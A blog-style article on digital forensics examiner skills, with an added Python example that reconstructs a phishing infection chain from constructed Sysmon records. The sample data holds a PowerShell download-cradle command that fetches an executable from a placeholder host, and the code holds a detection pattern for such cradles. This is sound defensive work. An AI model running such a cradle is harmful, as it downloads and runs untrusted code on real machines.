Technical Skill

Source: https://www.digitalforensics.com/blog/skill-and-knowledge-in-digital-forensics/

The issues facing computer forensics examiners can be broken down into three broad categories: technical, legal and administrative.

Technical issues
Encryption
Increasing storage space
New technologies
Anti-forensics

Forensics is critically important to the incident response process and is useful for both routine and timely response. For example, in an incident where a company is dealing with a successful phishing attack, forensic processes can be used to establish facts such as who clicked on the link, who was successfully phished or compromised, and what information was actually accessed or taken. Computer forensics has become its own area of scientific expertise, with accompanying coursework and certification.

What knowledge and skills should a digital examiner have?

  • Mobile Forensics. There are a lot of mobile devices around. Luckily for digital examiners, the war between developers of mobile device operating systems has ended: 99% of mobile devices now run iOS or Android. Knowledge of the forensic artifacts of just two mobile operating systems allows a digital examiner to explore a vast number of mobile devices. Mobile devices store a lot of private data about their owners, which can be used to investigate crimes. Also, some mobile devices remain vulnerable to malware despite the actions taken by the developers, which can lead to the theft of private data by hackers. There are several good tools for extracting and analyzing data from mobile devices, but manual analysis will uncover more forensic artifacts on the analyzed device.
  • Cloud Forensics. The cloud concept is very convenient for users. You can access your private information or working documents from anywhere in the world, without worrying that the hard drive in a laptop or desktop may fail or that priceless family photos will become inaccessible in a broken smartphone. Many cloud services allow users to copy all of their information and files to a local PC or laptop for free. Exploring the artifacts of cloud services on the owner's devices lets you understand which files were uploaded to or downloaded from a cloud, along with other information about the use of cloud services and the data held in them.
  • Drone Forensics. Every day, more and more drones are used in everyday life. Investigating information extracted from drones will soon become a routine job for digital examiners. We already see the use of encryption to protect data in the memory of drones and the use of cloud services for storing the information a drone needs to function.
  • Windows Forensics. The vast majority of PCs and laptops run Windows, and companies often run servers on Windows as well. Researchers constantly report the discovery of new artifacts that can be used in a forensic analysis. Therefore, knowledge of Windows Forensics is fundamental for any digital examiner.
  • Mac Forensics. Of course, the number of Mac computer owners varies from country to country, but the general trend is that the number of Macs arriving at digital forensic laboratories is increasing. Knowledge of Mac Forensics allows a digital examiner to examine such devices successfully.
  • File Systems Forensics. There are not many basic file systems: EXT, FAT, NTFS and HFS+. Knowledge of what kinds of artifacts remain in the file systems is needed in Windows Forensics, Incident Response, Data Recovery and Mobile Forensics.
  • Incident Response. There are a lot of tools on the internet for hackers and penetration testers. These tools automate the routine work of attackers. Therefore, the number of incidents involving the theft of money or of private or financial information is constantly increasing, and the demand for digital examiners with Incident Response skills is growing with it.
  • Memory Forensics. This is a specific area of knowledge that a digital examiner will not use on a day-to-day basis. However, knowledge of Memory Forensics allows significantly faster Incident Response, detection of malware, and decryption of drives and partitions. The examiner can also retrieve other data and files that are stored in the RAM of the device under examination.
  • Network Forensics. This allows detection of anomalies in the operation of computer networks and detection of an intruder. It is also used in dynamic analysis of malware.
  • Cyber Threat Intelligence. Hackers and pentesters can use a huge number of methods to penetrate a targeted computer or network. Knowledge of Cyber Threat Intelligence allows the examiner to narrow the whole variety of methods down to the few most likely ones. This reduces the response time to an incident and helps identify all compromised computers and other devices (for example, routers).
  • Malware Forensics. Of course, a digital examiner does not have the same skills as a malware analyst. However, the knowledge of a digital examiner should suffice to understand which of the viruses participated in the incident (usually a compromised system contains several viruses) and how the attack on the compromised system was carried out. For example, a typical attack on a computer looks like this: an email with a malicious document arrives at the email address of the computer's owner. When someone tries to open this document, it runs a PowerShell script that downloads an executable file (a virus). In order to understand how the incident happened and what happened on the compromised computer, knowledge of Malware Forensics is needed.
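From the examiner's side, the chain just described (document opened, PowerShell spawned, executable downloaded) leaves a process-creation trail that can be reconstructed from endpoint telemetry. The following added example is written for this page and is not code from the original article: it runs that check over constructed Sysmon-style records (field names follow Sysmon Event ID 1; the user, paths, times and URL are invented) and rebuilds the chain from parent/child process ids.

```python
import ntpath
import re
# Constructed Sysmon-style process-creation records (Event ID 1 field names);
# the user, paths, times and URL are made up for this example, not real telemetry.
def ev(time, pid, ppid, image, cmdline):
    return {"UtcTime": time, "ProcessId": pid, "ParentProcessId": ppid,
            "Image": image, "CommandLine": cmdline}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ev("09:12:01", 3980, 1200, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
       r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.docm"'),
    ev("09:12:09", 4120, 3980, PS,
       "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
       "'http://example.invalid/u.exe','C:\\Users\\alice\\AppData\\Local\\Temp\\u.exe')\""),
    ev("09:12:14", 4388, 4120, r"C:\Users\alice\AppData\Local\Temp\u.exe",
       r"C:\Users\alice\AppData\Local\Temp\u.exe"),
    ev("09:30:00", 5012, 1200, PS, r"powershell.exe -File C:\Scripts\backup.ps1"),  # benign
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Command-line fragments typical of PowerShell download cradles and encoded launches.
CRADLE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|"
                    r"start-bitstransfer|-enc(odedcommand)?\b", re.IGNORECASE)
DOC = re.compile(r'"([^"]+\.(?:docm?|dotm|xlsm?|xlam|pptm?))"', re.IGNORECASE)
base = lambda path: ntpath.basename(path).lower()  # executable name only

def descendants(events, pid):
    # Every process started, directly or transitively, by pid, in time order.
    found, frontier = [], {pid}
    for e in sorted(events, key=lambda x: x["UtcTime"]):
        if e["ParentProcessId"] in frontier:
            found.append(e)
            frontier.add(e["ProcessId"])
    return found

def triage(events):
    # Flag PowerShell started by an Office app: open document, cradle check, what ran next.
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ParentProcessId"])
        if not parent or base(parent["Image"]) not in OFFICE_APPS or base(e["Image"]) not in SHELLS:
            continue
        doc = DOC.search(parent["CommandLine"])
        findings.append({"shell_pid": e["ProcessId"], "cradle": bool(CRADLE.search(e["CommandLine"])),
                         "document": ntpath.basename(doc.group(1)) if doc else None,
                         "spawned": [base(c["Image"]) for c in descendants(events, e["ProcessId"])]})
    return findings
```

The administrator's own PowerShell launch from explorer.exe is left alone, while the Office-spawned shell is reported together with the document that was open and the executable it went on to start.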
